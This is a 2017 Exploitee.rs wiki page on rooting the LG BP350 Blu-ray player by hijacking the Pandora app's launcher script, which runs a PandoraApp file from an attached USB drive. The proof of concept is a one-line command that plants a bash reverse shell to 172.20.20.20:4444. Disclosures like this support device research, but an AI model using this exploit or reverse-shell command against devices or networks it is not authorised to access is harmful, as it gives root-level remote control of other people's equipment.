LG BP350​​

From Exploitee.rs
Revision as of 04:42, 6 August 2017 by 0x00string (talk | contribs)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigationJump to search

"Although the information we release has been verified and shown to work to the best our knowledge, we cant be held accountable for bricked devices or roots gone wrong."

LG BP350.JPG

LG BP350

"Enjoy TV shows, movies and more with this LG BP350 Blu-ray player, which features built-in Wi-Fi for access to Netflix, YouTube, Hulu Plus and other content. Blu-ray Disc and DVD playback in up to 1080p resolution enables a high-definition experience."

Purchase

Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device. Purchase the LG BP350 Blu-ray Player at Amazon

App Launcher Script Hijack

The LG BP350 includes an optional Pandora Internet Radio App which, once installed, results in a vulnerability caused by the launcher script, as illustrated below, for pandora checking against paths of volumes which are mapped to USB drives before executing the script at the path on the local filesystem. By creating a script named PandoraApp and placing it in the root of a flash drive and plugging it into the set top box, any arbitrary script can be executed with root privileges.

cat /mnt/rootfs_normal/usr/local/bin/pandora/pandora.sh
#!/bin/sh
#

echo "Enter pandora.sh"
echo "Call pandorastub" $PWD

export QT_QWS_FONTDIR=/usr/share/font
echo "pandora font path = " $QT_QWS_FONTDIR

export QT_PLUGIN_PATH=/plugins
echo "QT_PLUGIN_PATH =$QT_PLUGIN_PATH"

if [ -e /mnt/sda1/PandoraApp ]; then
    echo "/mnt/sda1/PandoraApp -qws -display directfb"
    /mnt/sda1/PandoraApp -qws -display directfb
elif [ -e /mnt/sdb1/PandoraApp ]; then
    echo "/mnt/sdb1/PandoraApp -qws -display directfb"
    /mnt/sdb1/PandoraApp -qws -display directfb
else
    echo "pandora not for vosd"
    echo "/usr/local/bin/pandora/PandoraApp -qws -display directfb"
    /usr/local/bin/pandora/PandoraApp -qws -display directfb 
fi

POC

The following command will add a file to a flashdrive that will spawn a reverse TCP shell, and proceed to execute the pandora app normally.

printf "/bin/bash -i >& /dev/tcp/172.20.20.20/4444 0>&1; /usr/local/bin/pandora/PandoraApp -qws -display directfb;" > /dev/yourflashdrive/PandoraApp